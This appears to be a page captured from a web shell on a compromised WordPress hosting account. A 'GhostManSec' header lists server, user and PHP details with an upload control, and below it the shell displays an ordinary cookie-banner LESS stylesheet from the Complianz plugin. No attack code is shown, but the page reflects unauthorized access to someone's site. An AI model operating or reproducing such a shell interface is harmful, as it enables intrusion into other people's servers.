GhostManSec
Server: Apache
System: Linux webm019.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: exhehbu (1008962)
PHP: 8.0.30
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/exhehbu/wp/wp-content/plugins/complianz-gdpr/cookiebanner/css/positions/bottom-right.less
.cmplz-cookiebanner {
  top:initial;
  left:initial;
  right: 10px;
  bottom: 10px;
  transform:initial;
}
@media (min-width:768px) {
  .cmplz-cookiebanner {
	min-width: var(--cmplz_banner_width);
	max-width: 100%;
	display: grid;
	grid-row-gap: 10px;
  }
}

@media (max-width:768px) {
  .cmplz-cookiebanner {
	//make sure cookie banner is full width and set to bottom
	left: initial;
	right:initial;
	bottom: 0;
	.cmplz-buttons {
	  flex-direction: column;
	}
	width: 100%;
  }
}
@media (min-width:768px) {
  .cmplz-message, .cmplz-categories {
	width: calc(~"var(--cmplz_banner_width) - 42px" );
  }
}